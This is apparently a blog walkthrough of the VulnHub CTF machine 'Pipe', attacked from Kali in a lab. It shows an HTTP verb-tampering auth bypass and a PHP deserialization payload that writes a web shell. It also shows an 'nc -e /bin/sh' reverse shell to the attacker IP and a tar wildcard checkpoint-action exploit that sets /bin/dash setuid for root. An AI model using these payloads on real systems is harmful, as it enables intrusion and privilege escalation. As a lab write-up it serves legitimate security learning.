SHADOW BROTHERS EXTRABACON

/dev/random: Pipe is another one CTF challange in the series /dev/random, which is created by Sagi-.

More information and OVA file download please check here.

Attacker & Target

Attacker: Kali2 Linux (10.1.1.130/24)

Target: /dev/random: Pipe (10.1.1.143/24)

Vulnerability & Exploit

• Basic Authentication bypass: HTTP method tamper
• Backup file Log.php.BAK exists in the server and source code disclosure
• Analyze and found the source code is able to upload arbitrary file, which can be used to upload web shell
• After got a shell, enumerating and find the vulnerablity tar with wildcard * can be exploited to ROOT

Method

• Scanned the network to discover the target server [arp-scan]
• Port scanned the target to discover running services and open ports [masscan && nmap]
• Using HTTP method tamper to bypass the Basic Authentication on resource page index.php [nmap with script]
• Brute force scan to find hidden path [dirbuster]
• Found and analysed source code in finding files php.js and Log.php.BAK, as a result, find a file upload function.
• Write web shell to target server and use nc to get a reverse shell [nc]
• Enumeration and exploit tar with wildcard vulnerability to get ROOT

Tools

All the tools used here can be found in Kali Linux

• arp-scan
• masscan
• nmap
• firefox
• nikto
• dirbuster
• burp suite
• nc

Walkthrough

Using arp-scan as routine to detect the target’s IP address (10.1.1.143 in this case).

1 2 3 4 5 6 7 8 9 10

root@kali:~# arp-scan -l Interface: eth0, datalink type: EN10MB (Ethernet) Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/) 10.1.1.1 00:50:56:c0:00:08 VMware, Inc. 10.1.1.2 00:50:56:fd:d1:6b VMware, Inc. 10.1.1.143 00:0c:29:64:39:5e VMware, Inc. 10.1.1.254 00:50:56:f5:74:35 VMware, Inc. 4 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.9: 256 hosts scanned in 2.657 seconds (96.35 hosts/sec). 4 responded

10.1.1.143 is our Target!

Then run masscan to detect opening ports on the target (masscan is much faster than nmap when doing a full ports scan, so here I use it to make a full scan and then use nmap to do a deep scan on target ports).

1 2 3 4 5 6 7 8 9 10

root@kali:~# masscan -p1-65535 10.1.1.143/32 --rate=10000 Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2015-11-21 00:47:26 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [65535 ports/host] Discovered open port 40117/tcp on 10.1.1.143 Discovered open port 111/tcp on 10.1.1.143 Discovered open port 80/tcp on 10.1.1.143 Discovered open port 22/tcp on 10.1.1.143

There are 4 ports (22, 80, 111, 40117) detected by masscan, then I run nmap to do a deeper service scan.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33

# Nmap 6.49BETA5 scan initiated Tue Nov 17 05:50:42 2015 as: nmap -sV -v -O -A -T4 -p80,22,111,44161 -oN 10.1.1.143_nmap.txt 10.1.1.143 Nmap scan report for 10.1.1.143 Host is up (0.00035s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0) | ssh-hostkey: | 1024 16:48:50:89:e7:c9:1f:90:ff:15:d8:3e:ce:ea:53:8f (DSA) | 2048 ca:f9:85:be:d7:36:47:51:4f:e6:27:84:72:eb:e8:18 (RSA) |_ 256 d8:47:a0:87:84:b2:eb:f5:be:fc:1c:f1:c9:7f:e3:52 (ECDSA) 80/tcp open http Apache httpd | http-auth: | HTTP/1.1 401 Unauthorized |_ Basic realm=index.php |_http-methods: No Allow or Public header in OPTIONS response (status code 401) |_http-server-header: Apache |_http-title: 401 Unauthorized 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100024 1 37301/udp status |_ 100024 1 44161/tcp status 44161/tcp open status 1 (RPC #100024) MAC Address: 00:0C:29:64:39:5E (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 3.X OS CPE: cpe:/o:linux:linux_kernel:3 OS details: Linux 3.2 - 3.19 Uptime guess: 0.001 days (since Tue Nov 17 05:49:56 2015) Network Distance: 1 hop ... turncate ...

Due to port 80 is open (providing web service on the target server), run Nikto to do a web vuln scan:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28

root@kali:~/the_pipe# nikto -host 10.1.1.143 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.1.1.143 + Target Hostname: 10.1.1.143 + Target Port: 80 + Start Time: 2015-11-20 19:53:42 (GMT-5) --------------------------------------------------------------------------- + Server: Apache + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + / - Requires Authentication for realm 'index.php' + No CGI Directories found (use '-C all' to force check all possible dirs) + / - Requires Authentication for realm 'index.php' + IP address found in the 'location' header. The IP is "127.0.1.1". + OSVDB-630: IIS may reveal its internal or real IP in the Location header via a request to the /images directory. The value is "http://127.0.1.1/images/". ... turncat ... + / - Requires Authentication for realm 'index.php' ... turncat ... + OSVDB-3268: /images/: Directory indexing found. + / - Requires Authentication for realm 'index.php' + OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found. + / - Requires Authentication for realm 'index.php' + 7667 requests: 0 error(s) and 7 item(s) reported on remote host + End Time: 2015-11-20 19:54:03 (GMT-5) (21 seconds) --------------------------------------------------------------------------- + 1 host(s) tested

Nikto scan could not find any suspicious footprint, then I try Dirbuster to brute force hidden folders / files:

Two source code files discovered in folder ‘scriptz’:

1 2	/scriptz/log.php.BAK /scriptz/php.js

Analyze the first file “log.php.BAK”, this is a backup of “log.php” obviously, so if I can find / run “log.php” I would be able to upload shell to the target server:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28

<\?php class Log { public $filename = ''; public $data = ''; public function __construct() { $this->filename = ''; $this->data = ''; } public function PrintLog() { $pre = "[LOG]"; $now = date('Y-m-d H:i:s'); $str = '$pre - $now - $this->data'; eval("\$str = \"$str\";"); echo $str; } public function __destruct() { file_put_contents($this->filename, $this->data, FILE_APPEND); // <== Here we can write any code into any file } } \?>

Both nmap and nikto results show us that index.php exists under the root path and it requires Basic authentication to access this page.

There is one method can be used to test if the authentication can be bypassed called http method tamper (first appears in 2004, https://bz.apache.org/bugzilla/show_bug.cgi?id=28778) and Nmap provides a script to auto-test it.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28

root@kali:~/the_pipe# nmap -p 80 --script http-method-tamper --script-args 'http-method-tamper.paths={/index.php}' 10.1.1.143 Starting Nmap 6.49BETA5 ( https://nmap.org ) at 2015-11-20 21:57 EST Nmap scan report for 10.1.1.143 Host is up (0.00024s latency). PORT STATE SERVICE 80/tcp open http | http-method-tamper: | VULNERABLE: | Authentication bypass by HTTP verb tampering | State: VULNERABLE (Exploitable) | This web server contains password protected resources vulnerable to authentication bypass | vulnerabilities via HTTP verb tampering. This is often found in web servers that only limit access to the | common HTTP methods and in misconfigured .htaccess files. | | Extra information: | | URIs suspected to be vulnerable to HTTP verb tampering: | /index.php [POST] | | References: | https://www.owasp.org/index.php/Testing_for_HTTP_Methods_and_XST_%28OWASP-CM-008%29 | http://capec.mitre.org/data/definitions/274.html | http://www.imperva.com/resources/glossary/http_verb_tampering.html |_ http://www.mkit.com.ar/labs/htexploit/ MAC Address: 00:0C:29:64:39:5E (VMware) Nmap done: 1 IP address (1 host up) scanned in 0.91 seconds

It is vulnerable to POST method, so now I start up burp proxy to bypass the authentication and got the protected page:

Bingo! Next we will check the source code:

index.php.txt (index.php.txt)download

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35

<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <script src="scriptz/php.js"></script> <script> function submit_form() { var object = serialize({id: 1, firstname: 'Rene', surname: 'Margitte', artwork: 'The Treachery of Images'}); object = object.substr(object.indexOf("{"),object.length); object = "O:4:\"Info\":4:" + object; document.forms[0].param.value = object; document.getElementById('info_form').submit(); } </script> <title>The Treachery of Images</title> </head> <h1><i>The Treachery of Images</i></h1> <hr /> From Wikipedia, the free encyclopedia <br /> <br /> The Treachery of Images (French: La trahison des images, 1928–29, sometimes translated as The Treason of Images) is a painting by the Belgian surrealist painter René Magritte, painted when Magritte was 30 years old. The picture shows a pipe. Below it, Magritte painted, "Ceci n'est pas une pipe." [sə.si ne paz‿yn pip], French for "This is not a pipe." <p> "The famous pipe. How people reproached me for it! And yet, could you stuff my pipe? No, it's just a representation, is it not? So if I had written on my picture 'This is a pipe', I'd have been lying!" </p> His statement is taken to mean that the painting itself is not a pipe. The painting is merely an image of a pipe. Hence, the description, "this is not a pipe." The theme of pipes with the text "Ceci n'est pas une pipe" is extended in his 1966 painting, Les Deux Mystères. It is currently on display at the Los Angeles County Museum of Art. The painting is sometimes given as an example of meta message conveyed by paralanguage. Compare with Korzybski's "The word is not the thing" and "The map is not the territory". <br /> <br /> <center><div style="width:500px;overflow:hidden;" > <img src="images/pipe.jpg" width="400px" height="auto" border="1"> </div> <form action="index.php" id="info_form" method="POST"> <input type="hidden" name="param" value="" /> <a href="#" onclick="submit_form(); return false;">Show Artist Info.</a> </form></center></html>

It loads scriptz/php.js and there is a link pointing to function submit_form with a hidden value param, then I use burp proxy to check what data will be sent when I click the link Show Artist Info, after URL decoded, I found the following data:

1	O:4:"Info":4:{s:2:"id";i:1;s:9:"firstname";s:4:"Rene";s:7:"surname";s:8:"Margitte";s:7:"artwork";s:23:"The Treachery of Images";}

After a close look at the source code in php.js, Log.php.BAK and index.php, I can manage to construct the following payload to upload a web shell:

1	O:3:"Log":2:{s:8:"filename";s:31:"/var/www/html/scriptz/shell.php";s:4:"data";s:30:"<\?php system($_GET['cmd']); \?>";}

Here we can see that shell.php has been created under folder scriptz and now we can run system commands.

The following URL will give us a reverse shell connect back to attacker’s port 4444

1	http://10.1.1.143/scriptz/shell.php?cmd=nc+-e+/bin/sh+10.1.1.130+4444

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15

root@kali:~/the_pipe# nc -lvnp 4444 listening on [any] 4444 ... connect to [10.1.1.130] from (UNKNOWN) [10.1.1.143] 33575 id uid=33(www-data) gid=33(www-data) groups=33(www-data) pwd /var/www/html/scriptz ls -al total 24 drwxr-xr-x 2 www-data www-data 4096 Nov 22 07:20 . drwxr-xr-x 4 www-data www-data 4096 Jul 9 13:49 .. -rw-r--r-- 1 www-data www-data 94 Jul 9 13:51 .htaccess -rw-r--r-- 1 www-data www-data 474 Jul 6 02:26 log.php.BAK -rw-r--r-- 1 www-data www-data 3768 Jul 5 19:02 php.js -rw-r--r-- 1 www-data www-data 35 Nov 22 07:20 shell.php

Then using python to jail break the shell and start enumerating

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17

python -c "import pty; pty.spawn('/bin/bash');" www-data@pipe:/var/www/html/scriptz$cd .. www-data@pipe:/var/www/html$ ls -al total 36 drwxr-xr-x 4 www-data www-data 4096 Jul 9 13:49 . drwxr-xr-x 3 root root 4096 Jul 5 14:46 .. -rw-r--r-- 1 www-data www-data 137 Jul 6 02:43 .htaccess -rw-r--r-- 1 www-data www-data 43 Jul 6 09:33 .htpasswd drwxr-xr-x 2 www-data www-data 4096 Jul 6 02:53 images -rw-r--r-- 1 www-data www-data 2801 Jul 9 13:49 index.php -rw-r--r-- 1 www-data www-data 150 Jul 6 01:50 info.php -rw-r--r-- 1 www-data www-data 474 Jul 6 03:43 log.php drwxr-xr-x 2 www-data www-data 4096 Nov 22 07:20 scriptz www-data@pipe:/var/www/html$ cat .htpasswd rene:$apr1$wfYjXf4U$0ZZ.qhGGrtkOxvKr5WFqX/

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28

www-data@pipe:/home/rene$ ls -al total 24 drwxr-xr-x 3 rene rene 4096 Jul 6 07:42 . drwxr-xr-x 3 root root 4096 Jul 5 14:09 .. -rw-r--r-- 1 rene rene 220 Jul 5 14:09 .bash_logout -rw-r--r-- 1 rene rene 3515 Jul 5 14:09 .bashrc -rw-r--r-- 1 rene rene 675 Jul 5 14:09 .profile drwxrwxrwx 2 rene rene 4096 Nov 22 07:38 backup www-data@pipe:/home/rene$ ls -al backup total 140 drwxrwxrwx 2 rene rene 4096 Nov 22 07:38 . drwxr-xr-x 3 rene rene 4096 Jul 6 07:42 .. -rw-r--r-- 1 rene rene 65404 Nov 22 07:35 backup.tar.gz -rw-r--r-- 1 rene rene 22959 Nov 22 07:38 sys-11286.BAK -rw-r--r-- 1 rene rene 23376 Nov 22 07:37 sys-20270.BAK -rw-r--r-- 1 rene rene 19123 Nov 22 07:36 sys-7508.BAK www-data@pipe:/home/rene$ ls -al backup total 156 drwxrwxrwx 2 rene rene 4096 Nov 22 07:39 . drwxr-xr-x 3 rene rene 4096 Jul 6 07:42 .. -rw-r--r-- 1 rene rene 65404 Nov 22 07:35 backup.tar.gz -rw-r--r-- 1 rene rene 22959 Nov 22 07:38 sys-11286.BAK -rw-r--r-- 1 rene rene 13451 Nov 22 07:39 sys-17501.BAK -rw-r--r-- 1 rene rene 23376 Nov 22 07:37 sys-20270.BAK -rw-r--r-- 1 rene rene 19123 Nov 22 07:36 sys-7508.BAK

Here we noticed that system doing backup automatically, so I go to check cron entry in /etc/crontab:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19

www-data@pipe:/home/rene$ cat /etc/crontab # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) # * * * * * root /root/create_backup.sh */5 * * * * root /usr/bin/compress.sh

Trying to check the script code in both .sh file, but only /usr/bin/compress.sh can be read:

1 2 3 4 5 6 7 8 9

www-data@pipe:/home/rene/backup$ cat /usr/bin/compress.sh cat /usr/bin/compress.sh #!/bin/sh rm -f /home/rene/backup/backup.tar.gz cd /home/rene/backup tar cfz /home/rene/backup/backup.tar.gz * chown rene:rene /home/rene/backup/backup.tar.gz rm -f /home/rene/backup/*.BAK

Here I noticed that tar is used with wildcard *, which can be exploited to execute arbitrary commands.

Here is the details about Unix wildcard exploit, the relevant information about tar can be found in point 4.3.

I will use setuid a shell command to get a ROOT shell, first of all, I have to check what kind of shell installed in the server.:

1 2 3 4 5 6

www-data@pipe:/home/rene/backup$ ls -al /bin/*sh ls -al /bin/*sh -rwxr-xr-x 1 root root 1029624 Nov 13 2014 /bin/bash -rwxr-xr-x 1 root root 125400 Nov 8 2014 /bin/dash lrwxrwxrwx 1 root root 4 Nov 13 2014 /bin/rbash -> bash lrwxrwxrwx 1 root root 4 Nov 8 2014 /bin/sh -> dash

Cool, I found /bin/dash appeared in the list, now I am going to create evil script and ROOT it:

1 2 3 4 5 6 7 8 9

www-data@pipe:/home/rene/backup$cd /home/rene/backup www-data@pipe:/home/rene/backup$echo > --checkpoint=1; www-data@pipe:/home/rene/backup$echo > --checkpoint-action=exec=sh\ shell.sh; www-data@pipe:/home/rene/backup$echo 'chmod u+s /bin/dash' > shell.sh www-data@pipe:/home/rene/backup$echo 'touch /home/rene/backup/done' >> shell.sh www-data@pipe:/home/rene/backup$cat shell.sh chmod u+s /bin/dash touch /home/rene/backup/done www-data@pipe:/home/rene/backup$chmod +x shell.sh

Now just waiting for couple of minutes and you will find that a new file named done has been created.

1 2 3 4 5 6 7 8 9 10

# ls -al ls -al total 44 -rw-r--r-- 1 www-data www-data 1 Nov 22 08:07 --checkpoint-action=exec=sh shell.sh -rw-r--r-- 1 www-data www-data 1 Nov 22 08:07 --checkpoint=1 drwxrwxrwx 2 rene rene 4096 Nov 24 05:40 . drwxr-xr-x 3 rene rene 4096 Jul 6 07:42 .. -rw-r--r-- 1 rene rene 20927 Nov 24 05:40 backup.tar.gz -rw-r--r-- 1 root root 0 Nov 24 05:40 done -rwxr-xr-x 1 www-data www-data 49 Nov 23 07:03 shell.sh

Now it is ready to run /bin/dash and enjoy the ROOT!

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65

www-data@pipe:/home/rene/backup$ /bin/dash /bin/dash # id id uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data) # whoami whoami root # ls -al /root ls -al /root total 28 drwx------ 2 root root 4096 Jul 9 13:53 . drwxr-xr-x 22 root root 4096 Jul 5 14:01 .. lrwxrwxrwx 1 root root 9 Jul 5 14:12 .bash_history -> /dev/null -rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc lrwxrwxrwx 1 root root 9 Jul 9 13:53 .nano_history -> /dev/null -rw-r--r-- 1 root root 140 Nov 20 2007 .profile -rwx------ 1 root root 120 Jul 6 08:59 create_backup.sh -rw------- 1 root root 4251 Jul 6 10:41 flag.txt # cat /root/flag.txt cat /root/flag.txt .aMMMMMMMMn. ,aMMMMn. .aMccccccccc*YMMn. `Mb aMccccccccccccccc*Mn MP .AMMMMn. MM `*YMMY*ccaM* dM* *YMMb YP `cMY YM. .dMMP aMn. .cMP *YMMn. aMMMMMMMMMMMY' .'YMMb. ccMP .dMcccccc*Mc....cMb.cMP' .dMMMMb;cccc*Mbcccc,IMMMMMMMn. dY*' '*M;ccccMM..dMMM..MP*cc*Mb YM. ,MbccMMMMMMMMMMMM*cccc;MP *Mbn;adMMMMMMMMMMMMMMMIcccc;M* dPcccccIMMMMMMMMMMMMMMMMa;c;MP Yb;cc;dMMMMMMMMMMMP*' *YMMP* *YMMMPYMMMMMMP*' curchack +####################################+ |====== | | |====== | | |====== | | |====== | | |====== | | +----------------------------------+-+ #################################### |====== | |====== | |===== | |==== | | | + + .d8888b. d8b d8b 888 d8b d88P Y88b Y8P 88P 888 Y8P 888 888 8P 888 888 .d88b. .d8888b888 88888b." .d88b. .d8888b 888888 88888b. 8888b. .d8888b 888 88888888b. .d88b. 88888b. 88888888b. .d88b. 888 d8P Y8bd88P" 888 888 "88b d8P Y8b88K 888 888 "88b "88b88K 888 888888 "88bd8P Y8b 888 "88b888888 "88bd8P Y8b 888 88888888888888 888 888 888 88888888"Y8888b.888 888 888.d888888"Y8888b. 888 888888 88888888888 888 888888888 88888888888 Y88b d88PY8b. Y88b. 888 888 888 Y8b. X88Y88b. 888 d88P888 888 X88 Y88b 888888 888Y8b. 888 d88P888888 d88PY8b. d8b "Y8888P" "Y8888 "Y8888P888 888 888 "Y8888 88888P' "Y888 88888P" "Y888888 88888P' "Y88888888 888 "Y8888 88888P" 88888888P" "Y8888Y8P 888 888 888 888 888 888 888 888 888 Well Done! Here's your flag: 0089cd4f9ae79402cdd4e7b8931892b7

2015-11-23 05:43:52 -0500

pipe, vulnhub, wildcard exploit

http://f4l13n5n0w.github.io/blog/2015/11/23/vulnhub-pipe/